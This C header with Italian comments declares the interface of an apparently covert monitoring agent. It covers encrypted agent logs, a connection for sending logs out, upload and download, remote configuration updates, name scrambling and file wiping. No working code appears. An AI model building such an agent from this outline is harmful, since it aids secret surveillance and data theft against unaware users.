extern void LOG_InitLog(void);
extern BOOL LOG_InitAgentLog(DWORD);
extern void LOG_StopAgentLog(DWORD);
extern BOOL LOG_ReportLog(DWORD, BYTE *, DWORD);
extern HANDLE Log_CreateFile(DWORD , char *);
extern void Log_CloseFile(HANDLE);
extern BOOL Log_WriteFile(HANDLE , BYTE *, DWORD);
extern BOOL LOG_SendLogQueue(DWORD, DWORD, DWORD);
extern BOOL LOG_StartLogConnection(char *, char *);
extern void LOG_CloseLogConnection(void);
extern void Log_RemoveFiles(void);
extern BOOL LOG_UploadDownload(DWORD, DWORD, DWORD);
extern char *LOG_ScrambleName(char *, BYTE, BOOL);
extern void Log_Sanitize(char *);
extern void Log_SwitchQueue(void);
extern BOOL Log_CopyFile(char *, DWORD);
extern BOOL Log_SaveAgentState(DWORD, BYTE *, DWORD);
extern BOOL Log_RestoreAgentState(DWORD, BYTE *, DWORD);
extern void LOG_InitCryptKey(BYTE *);

#define LOG_CONF_NEW_FILE 0  // c'e' un nuovo file
#define LOG_CONF_NOP      1  // non c'e' un nuovo file
#define LOG_CONF_ERROR    2  // errore ASP
extern DWORD LOG_ReceiveNewConf(void);

extern BOOL log_wipe_file; // usato per decidere se fare il wiping

// Deve essere pari
#define ALPHABET_LEN 64
